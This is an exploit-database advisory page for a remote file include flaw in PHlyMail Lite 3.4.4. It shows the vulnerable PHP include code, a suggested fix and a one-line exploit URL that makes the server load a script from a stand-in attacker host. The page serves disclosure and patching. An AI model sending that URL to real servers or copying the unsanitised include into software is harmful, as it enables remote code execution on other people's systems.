PHlyMail Lite - exploit.company

vendor:

PHlyMail Lite

by:

Kacper (a.k.a Rahim)

9,3

CVSS

HIGH

Remote File Include

CWE

Product Name: PHlyMail Lite

Affected Version From: 3.4.4 (Build 3.04.04)

Affected Version To: 3.4.4 (Build 3.04.04)

Patch Exists: YES

Related CWE: N/A

CPE: a:phlymail:phlymail_lite

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2007

PHlyMail Lite <= 3.4.4 (Build 3.04.04) [_PM_[path][handler]] Remote File Include Vulnerability

PHlyMail Lite version 3.4.4 (Build 3.04.04) is vulnerable to a remote file include vulnerability. This vulnerability exists due to insufficient sanitization of user-supplied input in the 'handler' parameter of the 'mod.listmail.php' script. An attacker can exploit this vulnerability to include arbitrary remote files and execute arbitrary code on the vulnerable system.

Mitigation:

Upgrade to the latest version of PHlyMail Lite or apply the patch provided by the vendor.

Source

Exploit-DB raw data:

/*
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- PHlyMail Lite <= 3.4.4 (Build 3.04.04) [_PM_[path][handler]] Remote File Include Vulnerability
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- [Script name: PHlyMail Lite v. 3.4.4 (Build 3.04.04)
- [Script site: http://phlymail.de/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-          Find by: Kacper (a.k.a Rahim)
+
-          Contact: kacper1964@yahoo.pl
-                        or
-          http://www.devilteam.yum.pl/
-                       and
-           http://www.rahim.webd.pl/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Special Greetz: DragonHeart ;-)
- Ema: Leito, Adam, DeathSpeed, Drzewko, pepi
-
!@ Przyjazni nie da sie zamienic na marne kozysci @!
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
-            Z Dedykacja dla osoby,
-         bez ktorej nie mogl bym zyc...
-           K.C:* J.M (a.k.a Magaja)
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
*/
/*
+++++++++++++++++++++START+++++++++++++++++++++++
vulnerable code => handlers/email/mod.listmail.php line 12-25:
....
$use_preview = (isset($_PM_['core']['folders_usepreview']) && $_PM_['core']['folders_usepreview']) ? true : false;

$ordfields = array
       ('hfrom', 'hto', 'hcc', 'hbcc', 'hsubject', 'hdate_recv', 'hdate_sent', 'hsize', 'hpriority'
       ,'attachments', 'meta_read', 'meta_type', 'meta_colour'
       );
require_once($_PM_['path']['handler'].'/'.$_REQUEST['handler'].'/fs.php');
require_once($_PM_['path']['lib'].'/phm_streaming_mailparser.php');

// We changed the folder, got to reset the page number to 0
if (isset($_REQUEST['workfolder']) && isset($_SESSION['workfolder'])
       && $_REQUEST['workfolder'] != $_SESSION['workfolder']) {
   $_SESSION['WPs_pagenum'] = 0;
}
....
+++++++++++++++++++++++++++++++++++++++++++++++++
*/
/*
+++++++++++++++++++++FIX+++++++++++++++++++++++++
handlers/email/mod.listmail.php line 12-25:
Add Line1:
....
if (!defined('_IN_PHM_')) die();
....
$use_preview = (isset($_PM_['core']['folders_usepreview']) &&
$_PM_['core']['folders_usepreview']) ? true : false;

$ordfields = array
       ('hfrom', 'hto', 'hcc', 'hbcc', 'hsubject', 'hdate_recv', 'hdate_sent', 'hsize', 'hpriority'
       ,'attachments', 'meta_read', 'meta_type', 'meta_colour'
       );
require_once($_PM_['path']['handler'].'/'.$_REQUEST['handler'].'/fs.php');
require_once($_PM_['path']['lib'].'/phm_streaming_mailparser.php');

// We changed the folder, got to reset the page number to 0
if (isset($_REQUEST['workfolder']) && isset($_SESSION['workfolder'])
       && $_REQUEST['workfolder'] != $_SESSION['workfolder']) {
   $_SESSION['WPs_pagenum'] = 0;
}
....
++++++++++++++++++++THE+END++++++++++++++++++++++
*/
#Exploit:

http://www.site.com/[phlymail_path]/handlers/email/mod.listmail.php?_PM_[path][handler]=[http://www.myevilsite.com/evil_scripts.txt]

# milw0rm.com [2006-08-18]